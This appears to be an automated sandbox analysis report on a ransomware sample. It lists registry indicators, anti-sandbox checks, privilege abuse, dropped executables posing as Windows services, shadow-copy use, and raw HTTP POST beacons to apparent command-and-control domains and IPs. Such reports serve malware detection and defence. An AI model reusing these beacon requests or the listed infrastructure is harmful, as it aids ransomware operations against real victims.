Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000eda693cb4bbada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a3a774cb4bbada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\mshta.exe,-6412 = "HTML Application"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000281525cc4bbada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-124 = "Microsoft Word Macro-Enabled Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9907 = "MIDI Sequence"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-103 = "Microsoft Excel Macro-Enabled Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-184 = "Microsoft PowerPoint Macro-Enabled Design Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000123c86ca4bbada01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d7e350cb4bbada01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\wshext.dll,-4802 = "VBScript Script File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9905 = "Video Clip"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003a3e0dcc4bbada01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\wshext.dll,-4803 = "VBScript Encoded Script File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000009ce18ecb4bbada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\windows.storage.dll,-10152 = "File folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-115 = "Microsoft Excel 97-2003 Worksheet"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9910 = "Windows Media Audio/Video playlist"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c40896cb4bbada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-103 = "Windows PowerShell Script"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000096ce7bcb4bbada01	SearchProtocolHost.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
2068	DiagnosticsHub.StandardCollector.Service.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Token: SeAuditPrivilege	4896	fxssvc.exe
Token: SeRestorePrivilege	2088	TieringEngineService.exe
Token: SeManageVolumePrivilege	2088	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	1744	AgentService.exe
Token: SeBackupPrivilege	4316	vssvc.exe
Token: SeRestorePrivilege	4316	vssvc.exe
Token: SeAuditPrivilege	4316	vssvc.exe
Token: SeBackupPrivilege	5108	wbengine.exe
Token: SeRestorePrivilege	5108	wbengine.exe
Token: SeSecurityPrivilege	5108	wbengine.exe
Token: 33	400	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	400	SearchIndexer.exe
Token: SeDebugPrivilege	3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Token: SeDebugPrivilege	3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Token: SeDebugPrivilege	3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Token: SeDebugPrivilege	3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Token: SeDebugPrivilege	3760	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Token: SeDebugPrivilege	2068	DiagnosticsHub.StandardCollector.Service.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 460	400	SearchIndexer.exe	106
PID 400 wrote to memory of 460	400	SearchIndexer.exe	106
PID 400 wrote to memory of 4656	400	SearchIndexer.exe	107
PID 400 wrote to memory of 4656	400	SearchIndexer.exe	107

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
PID:4616

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:2060

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:4744

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:5052

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:1036

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:2356

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:3864

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
PID:1756

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:3348

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:2504

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1140

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:2180

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2560

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:3656

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:1616

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:5048

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:1600

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:400
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:460
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  - Modifies data under HKEY_USERS
  PID:4656

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

pywolwnvd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
DNS

pywolwnvd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
POST

http://pywolwnvd.biz/i

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /i HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5ef6e2209c4e5da3bb5798754278d353|191.101.209.39|1717923759|1717923759|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://pywolwnvd.biz/bdvi

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /bdvi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=40121ae1e285b5f23b21fd4e0ba190a5|191.101.209.39|1717923759|1717923759|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ssbzmoy.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
DNS

ssbzmoy.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
POST

http://ssbzmoy.biz/prpswuqacbwel

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /prpswuqacbwel HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
